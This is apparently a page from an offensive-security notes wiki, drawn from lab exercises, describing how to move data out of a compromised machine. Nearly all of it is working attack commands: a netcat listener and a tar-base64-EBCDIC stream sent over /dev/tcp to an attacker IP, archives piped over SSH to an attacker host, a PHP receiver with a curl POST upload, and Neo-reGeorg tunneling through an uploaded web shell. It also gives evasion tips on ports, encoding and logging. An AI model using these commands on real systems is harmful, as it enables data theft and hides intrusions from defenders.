Data Exfiltration

Exfil using a TCP socket

Good for when you know there are no network based security products
This is NOT recommending in a network that is well secured
This is easy to detect because we are using anon standard protocols

This shows the two hosts communicating over port 1337
In the real world please pick a normal port like 443 or 80, 8080, 8443 etc, etc
The first machine listens on 1337
The other machine connects to 1.2.3.4:1337
The first machine establishes the connection
Finally you can now send and receive data

Set up your listener on the attack machines

nc -lvp 8080 > /tmp/task4-creds.data
Listening on [0.0.0.0] (family 0, port 8080)

Now on the victim to exfil the data

thm@victim1:$ tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
0+1 records in
0+1 records out
260 bytes copied, 9.8717e-05 s, 2.6 MB/s

Note that we used the Base64 and EBCDIC encoding to protect the data during the exfiltration. If someone inspects the traffic, it would be in a non-human readable format and wouldn't reveal the transmitted file type.

ls -l /tmp/
-rw-r--r-- 1 root root       240 Apr  8 11:37 task4-creds.data

On the attack box, we need to convert the received data back to its original status. We will be using the dd tool to convert it back.

dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
tar xvf task4-creds.tar
task4/ 
task4/creds.txt

Exfiltration using SSH

SSH protocol establishes a secure channel to interact and move data between the client and server, so all transmission data is encrypted over the network or the Internet.

To transfer data over the SSH, we can use either the Secure Copy Protocol SCP or the SSH client.
Lets assume scp is not on the target machine
From the victim machine
jump.example.com is the attacker machine

tar cf - task5/ | ssh user@jump.example.com "cd /tmp/; tar xpf -"

We used the tar command the same as the previous task to create an archive file of the task5 directory.
Then we passed the archived file over the ssh. SSH clients provide a way to execute a single command without having a full session.
We passed the command that must be executed in double quotations, "cd /tmp/; tar xpf. In this case, we change the directory and unarchive the passed file.

This one line command will push directories or files from the victim machine
This is a disaster for logging
Each time you do this will log on the victim machine with the ip of your attacker machine
Use with extreme caution!!!!

HTTP POST Request

Exfiltration data through the HTTP(s) protocol is one of the best options because it is challenging to detect. It is tough to distinguish between legitimate and malicious HTTP traffic.
We will use the POST HTTP method in the data exfiltration, and the reason is with the GET request, all parameters are registered into the log file.
While using POST request, it doesn't. The following are some of the POST method benefits:
POST requests are never cached
POST requests do not remain in the browser history
POST requests cannot be bookmarked
POST requests have no restrictions on data length

Example Apache Log

Take a look at the different web logs
The POST contains way less about our activities

10.10.198.13 - - [22/Apr/2022:12:03:11 +0100] "GET /example.php?file=dGhtOnRyeWhhY2ttZQo= HTTP/1.1" 200 147 "-" "curl/7.68.0"
10.10.198.13 - - [22/Apr/2022:12:03:25 +0100] "POST /example.php HTTP/1.1" 200 147 "-" "curl/7.68.0"

We prefer HTTPS but can use either HTTPS or HTTP for data exfiltration
We will need a php page that handles the post requests on our attack or exfil machine

Steps to exfil data

Set up a webserver on your attack machine with a .php page
The C2 agent or attacker sends the data to the page using the curl command
The webserver will recieve the data and store it
We will use contact.php for our web server and store the files collected in the /tmp folder

php file

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

run the apache2 server

sudo systemctl start apache2

Exfil the files

curl --data "file=$(tar zcf - task6 | base64)" http://web.example.com/contact.php

The base64 recieved will be broken due to the url encdoding over the HTTP.
The + symbol has been replaced with ' ' (spaces)
Can easily be fixed with the sed command

sudo sed -i 's/ /+/g' /tmp/http.bs64
#now decode it 
cat /tmp/http.bs64 | base64 -d | tar xvfz -

HTTP Tunneling

Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via HTTP
This is useful when certain hosts are not able to reach the internet

For HTTP Tunneling, we will be using a Neo-reGeorg tool to establish a communication channel to access the internal network devices.
Now lets generate an encrypted client file to upload it to the victim web server

python3 neoreg.py generate -k my_key

-k is the key for the file so in the real world make it strong
The previous command generates encrypted Tunneling clients with my_key key in the neoreg_servers/ directory. Note that there are various extensions available, including PHP, ASPX, JSP, etc.
We will be using tunnel.php
Upload the tunnel.php file to the victim web server
Now lets connect to the neo from our attack machine that we just uploaded

python3 neoreg.py -k my_key -u http://MACHINE_IP/uploader/files/tunnel.php

Once you connect we are ready to use the tunnel connection as a proxy on out local machine 127.0.0.1:1080 in the real world change the port to something random
Now we can tunnel further into the network
To curl with socks we can do what is below

curl --socks5 127.0.0.1:1080 http://172.20.0.121:80

PreviousBackdoor Linux Commands NextExploit Development

Last updated 1 year ago

10.10.198.13 - - [22/Apr/2022:12:03:11 +0100] "GET /example.php?file=dGhtOnRyeWhhY2ttZQo= HTTP/1.1" 200 147 "-" "curl/7.68.0" 10.10.198.13 - - [22/Apr/2022:12:03:25 +0100] "POST /example.php HTTP/1.1" 200 147 "-" "curl/7.68.0"